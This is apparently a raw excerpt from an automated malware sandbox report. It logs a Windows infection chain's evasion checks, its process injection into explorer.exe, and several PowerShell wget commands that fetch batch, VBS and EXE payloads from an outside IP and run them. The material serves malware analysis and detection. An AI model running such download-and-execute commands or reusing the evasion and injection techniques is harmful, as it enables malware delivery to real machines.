                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: C:\Users\user\DZIPR.exeAPI/Special instruction interceptor: Address: 6C5B7C44
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI/Special instruction interceptor: Address: 6C5B7C44
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI/Special instruction interceptor: Address: 6C5B7945
                      Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C5B3B54
                      Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 8FA317
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3631Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4211Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3046Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2607Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4872Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2554Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7635Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2050Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qapuwvrJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\demhwkJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gpsJump to dropped file
                      Source: C:\Users\user\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_17-18806
                      Source: C:\Users\user\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_17-18904
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_18-15698
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_18-16967
                      Source: C:\Users\user\DZIPR.exeAPI coverage: 4.4 %
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI coverage: 4.6 %
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI coverage: 3.9 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep count: 3631 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188Thread sleep count: 4211 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3000Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep count: 3046 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep count: 2607 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3004Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep count: 4872 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2064Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep count: 2554 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep count: 7635 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864Thread sleep count: 2050 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5692Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4392Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,16_2_0040301A
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_00402B79
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA4748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,17_2_6FA4748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C51748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,18_2_6C51748E
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,23_2_6FAC748E
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                      Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6vmware
                      Source: AUGUST.exe, 00000010.00000002.2347238226.000000000051F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                      Source: svchost.exe, 00000015.00000002.3402164901.0000020619C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.3403620854.000002061F257000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                      Source: explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                      Source: C:\Users\user\DZIPR.exeAPI call chain: ExitProcess graph end nodegraph_17-18905
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI call chain: ExitProcess graph end nodegraph_18-15700
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI call chain: ExitProcess graph end nodegraph_18-15730
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA53F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_6FA53F34
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,16_2_00406D5D
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA45D78 mov eax, dword ptr fs:[00000030h]17_2_6FA45D78
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA45CA0 mov eax, dword ptr fs:[00000030h]17_2_6FA45CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C515CA0 mov eax, dword ptr fs:[00000030h]18_2_6C515CA0
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAC5CA0 mov eax, dword ptr fs:[00000030h]23_2_6FAC5CA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA5CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_6FA5CE5C
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA58034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_6FA58034
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C52CE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_6C52CE5C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C523F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_6C523F34
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C528034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_6C528034
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD3F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_6FAD3F34
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FADCE5C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_6FADCE5C
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD8034 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_6FAD8034

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6FA466A2Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6FB2E812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6FB32B7A
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x6C582A72Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6C5166A2Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeNtQuerySystemInformation: Direct from: 0x6FAC66A2
                      Source: C:\Users\user\DZIPR.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 1460 base: 8F79C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 1460 base: 400000 value: 00Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 5388 base: 8F79C0 value: 55Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 5388 base: 400000 value: 00Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 4924 base: 8F79C0 value: 55
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 4924 base: 400000 value: 00
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 8F79C0
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 400000
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.batJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\user\AppData\Roaming/hi.vbsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AUGUST.exe C:\Users\user\AppData\Roaming/AUGUST.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeProcess created: C:\Users\user\DZIPR.exe "C:\Users\user\DZIPR.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_0040D72E cpuid 16_2_0040D72E
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,16_2_00401F9D
                      Source: C:\Users\user\DZIPR.exeCode function: GetLocaleInfoA,17_2_6FA64DBC
                      Source: C:\Users\user\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,17_2_6FA489B5
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoA,18_2_6C534DBC
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,18_2_6C5189B5
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoA,23_2_6FAE4DBC
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW,23_2_6FAC89B5
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
